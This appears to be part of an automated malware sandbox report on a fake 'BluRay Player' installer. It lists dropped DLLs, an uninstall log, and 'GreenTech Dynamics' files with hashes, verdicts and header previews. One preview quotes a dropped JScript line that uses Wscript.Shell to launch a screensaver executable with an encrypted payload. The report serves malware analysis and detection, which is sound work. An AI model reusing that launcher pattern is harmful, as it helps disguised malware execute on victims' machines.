Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libjpeg-8.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	509934
Entropy (8bit):	6.031080686301204
Encrypted:	false
SSDEEP:	6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
MD5:	02E6C6AB886700E6F184EEE43157C066
SHA1:	E796B7F7762BE9B90948EB80D0138C4598700ED9
SHA-256:	EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
SHA-512:	E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................\|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblcms2-2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	397808
Entropy (8bit):	6.396146399966879
Encrypted:	false
SSDEEP:	6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
MD5:	E0747D2E573E0A05A7421C5D9B9D63CC
SHA1:	C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
SHA-256:	25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
SHA-512:	201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblzma-5.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	171848
Entropy (8bit):	6.579154579239999
Encrypted:	false
SSDEEP:	3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
MD5:	236A679AB1B16E66625AFBA86A4669EB
SHA1:	73AE354886AB2609FFA83429E74D8D9F34BD45F2
SHA-256:	B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
SHA-512:	C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..\|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpango-1.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	259014
Entropy (8bit):	6.075222655669795
Encrypted:	false
SSDEEP:	3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
MD5:	B4FDE05A19346072C713BE2926AF8961
SHA1:	102562DE2240042B654C464F1F22290676CB6E0F
SHA-256:	513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
SHA-512:	9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangocairo-1.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	64724
Entropy (8bit):	5.910307743399971
Encrypted:	false
SSDEEP:	768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
MD5:	7AF455ADEA234DEA33B2A65B715BF683
SHA1:	F9311CB03DCF50657D160D89C66998B9BB1F40BA
SHA-256:	6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
SHA-512:	B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangoft2-1.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92019
Entropy (8bit):	5.974787373427489
Encrypted:	false
SSDEEP:	1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
MD5:	CC7DAD980DD04E0387795741D809CBF7
SHA1:	A49178A17B1C72AD71558606647F5011E0AA444B
SHA-256:	0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
SHA-512:	E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0..............................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.........................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangomm-1.4-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	165739
Entropy (8bit):	6.062324507479428
Encrypted:	false
SSDEEP:	3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
MD5:	E2F18B37BC3D02CDE2E5C15D93E38418
SHA1:	1A6C58F4A50269D3DB8C86D94B508A1919841279
SHA-256:	7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
SHA-512:	61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangowin32-1.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	101544
Entropy (8bit):	6.237382830377451
Encrypted:	false
SSDEEP:	1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
MD5:	E13FCD8FB16E483E4DE47A036687D904
SHA1:	A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
SHA-256:	0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
SHA-512:	38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......... ...,..................@.0@.bss.........P........................`..edata..-....`.....................@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpcre-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	291245
Entropy (8bit):	6.234245376773595
Encrypted:	false
SSDEEP:	6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
MD5:	2D8A0BC588118AA2A63EED7BF6DFC8C5
SHA1:	7FB318DC21768CD62C0614D7AD773CCFB7D6C893
SHA-256:	707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
SHA-512:	A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpixman-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	706136
Entropy (8bit):	6.517672165992715
Encrypted:	false
SSDEEP:	12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
MD5:	3A8A13F0215CDA541EC58F7C80ED4782
SHA1:	085C3D5F62227319446DD61082919F6BE1EFD162
SHA-256:	A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
SHA-512:	4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpng16-16.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	248781
Entropy (8bit):	6.474165596279956
Encrypted:	false
SSDEEP:	3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
MD5:	C4002F9E4234DFB5DBE64C8D2C9C2F09
SHA1:	5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
SHA-256:	F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
SHA-512:	4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\librsvg-2-2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	248694
Entropy (8bit):	6.346971642353424
Encrypted:	false
SSDEEP:	6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
MD5:	39A15291B9A87AEE42FBC46EC1FE35D6
SHA1:	AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
SHA-256:	7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
SHA-512:	FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................\|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libsigc-2.0-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	30994
Entropy (8bit):	5.666281517516177
Encrypted:	false
SSDEEP:	768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
MD5:	3C033F35FE26BC711C4D68EB7CF0066D
SHA1:	83F1AED76E6F847F6831A1A1C00FEDC50F909B81
SHA-256:	9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
SHA-512:	7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#........l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.........................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libtiff-5.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	448557
Entropy (8bit):	6.353356595345232
Encrypted:	false
SSDEEP:	12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
MD5:	908111F583B7019D2ED3492435E5092D
SHA1:	8177C5E3B4D5CC1C65108E095D07E0389164DA76
SHA-256:	E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
SHA-512:	FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....\|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\libwinpthread-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	65181
Entropy (8bit):	6.085572761520829
Encrypted:	false
SSDEEP:	768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
MD5:	98A49CC8AE2D608C6E377E95833C569B
SHA1:	BA001D8595AC846D9736A8A7D9161828615C135A
SHA-256:	213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
SHA-512:	C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................

C:\Users\user\AppData\Local\BluRay Player 1.2.16\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	InnoSetup Log BluRay Player, version 0x30, 5690 bytes, 980108\user, "C:\Users\user\AppData\Local\BluRay Player 1.2.16"
Category:	dropped
Size (bytes):	5690
Entropy (8bit):	4.818367107355253
Encrypted:	false
SSDEEP:	48:4v+/tsyMaLBoED8rpLLeQAWLBm9tR+4bLVO3471YkunnvsHUZo2gK79Khx/KGcrf:kYyyWED8rpL3Dk9f+eOIhknszqMqMKj
MD5:	56EF16223573991AC52C18FAB86815B9
SHA1:	D10FC03C0200BACFF1B0A3240053C2D6ECEB39A5
SHA-256:	0C263B2B30D0D96A923A0E182C696FCF92DEFE9C68A10504FA1E21E8B936B1AD
SHA-512:	101C7E17E6DD549E315E214895C33425E1499883EB212C4A8F463EFDD25260DFEE5DFB5A7595DC293BCEC771A7F251ECB1C2209D12637668BCE267DDBADBAB1D
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Uninstall Log (b)....................................BluRay Player...................................................................................................................BluRay Player...................................................................................................................0... ...:...%..........................................................................................................................)V........S....980108.user2C:\Users\user\AppData\Local\BluRay Player 1.2.16...............Y.. .....h......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:Use

C:\Users\user\AppData\Local\BluRay Player 1.2.16\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	718497
Entropy (8bit):	6.514957029959331
Encrypted:	false
SSDEEP:	12288:TTPcYn5c/rPx37/zHBA6a5UeYpChr1CERdSrNdyR6y3o1a+mxyFz:HPcYn5c/rPx37/zHBA6pFpCZ1CEuy3op
MD5:	83883DB30CB1CCCC6AF3B89977C65EAD
SHA1:	5411F15732F1C035E12B4B384ED401A7313712E9
SHA-256:	82BA978F9C5360F23FD9AECFD4C9B06F2E3E3AD535C02E57099619A9CA96D44D
SHA-512:	55721D91D2B8D9B0BE6C962013FAF2642811B45F35016A507B2209109329CCF5BE071C9A118C9ABEE12FBB142E97364210E9E2AB3775400B8291CD82E8E7B838
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%..................................................................................................................CODE....@........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................V..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.683665567300122
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5iXltLwvHFZo5uWAX+aJp6/h4EkD5iXltUM:RiJBJHonwWDaJ0/hJkDQtMHFywWDaJ0V
MD5:	25FABDFF6FD3A6E33179A888FF9AB827
SHA1:	5E2336A3873FA76532163F2684054CE18B67458A
SHA-256:	B9436DF316EE0E2C7DC80817710B530594AF4901A4A14CCCDCC2B7F12AC72A9C
SHA-512:	ABA139B84EDE62B27420BB28BC2E0BE21A191EF06976849429D96FE47CEB0432645430386B735B04D083C25FE7F1A431242AF07EAB3A2435FA27D7DB13F56800
Malicious:	true
Reputation:	unknown
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\EcoCraft.scr\" \"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\O\"")

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\GreenTech Dynamics\O

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	data
Category:	dropped
Size (bytes):	594650
Entropy (8bit):	7.9996649139256055
Encrypted:	true
SSDEEP:	12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
MD5:	4B0812FABC1BA34D8D45D28180F6C75F
SHA1:	B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
SHA-256:	73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
SHA-512:	7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
Malicious:	false
Reputation:	unknown
